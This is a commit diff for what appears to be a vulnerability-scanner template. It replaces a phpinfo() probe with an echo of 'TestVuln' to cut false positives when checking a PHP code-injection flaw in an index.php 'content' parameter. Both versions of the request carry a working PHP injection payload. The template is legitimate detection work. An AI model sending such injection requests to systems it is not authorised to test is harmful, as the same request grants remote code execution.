fix: Update the template to avoid false positives
While testing I got a false positive. The `phpinfo();` was one `index.php` and any parameter appended did not affect the output. So I got a false positive because the template tests for `phpinfo();`. So I propose that the test string is updated to something random and if there is execution the string will show on the output.patch-1
parent
cce6abaebf
commit
0ea1df844a
|
@ -11,16 +11,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?g=g&m=Door&a=index&content=<?php%20phpinfo();"
|
||||
- "{{BaseURL}}/index.php?g=g&m=Door&a=index&content=<?php%20echo%20'TestVuln';"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "PHP Extension"
|
||||
- "PHP Version"
|
||||
- "PHP License"
|
||||
- "PHP Variables"
|
||||
- "TestVuln"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
|
|
Loading…
Reference in New Issue